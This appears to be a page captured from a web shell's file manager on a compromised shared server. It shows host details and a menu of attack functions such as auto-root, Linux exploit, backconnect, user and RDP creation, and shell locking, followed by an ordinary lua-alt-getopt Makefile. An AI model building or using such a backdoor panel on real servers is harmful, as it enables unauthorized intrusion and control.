Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
texlive-doc /
support /
lua-alt-getopt /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
ChangeLog
1.37
KB
-rw-r--r--
Makefile
654
B
-rw-r--r--
NEWS.gz
408
B
-rw-r--r--
README
1.43
KB
-rw-r--r--
alt_getopt
730
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
PREFIX?=/usr/local LUAVER?=5.1 LUAMODDIR?=${PREFIX}/lib/lua/${LUAVER} ################################################## VERSION= 0.7.0 PROJECTNAME= lua-alt-getopt BIRTHDATE= 2009-01-10 FILES= alt_getopt.lua FILESDIR= ${LUAMODDIR} INST_DIR?= ${INSTALL} -d ################################################## .PHONY: install-dirs install-dirs: $(INST_DIR) ${DESTDIR}${LUAMODDIR} .PHONY: test test: @echo 'running tests...'; \ ln -f -s ${.CURDIR}/alt_getopt.lua ${.CURDIR}/tests; \ export OBJDIR=${.OBJDIR}; \ if cd ${.CURDIR}/tests && ./test.sh; \ then echo ' succeeded'; \ else echo ' failed'; false; \ fi .include <bsd.prog.mk>
Close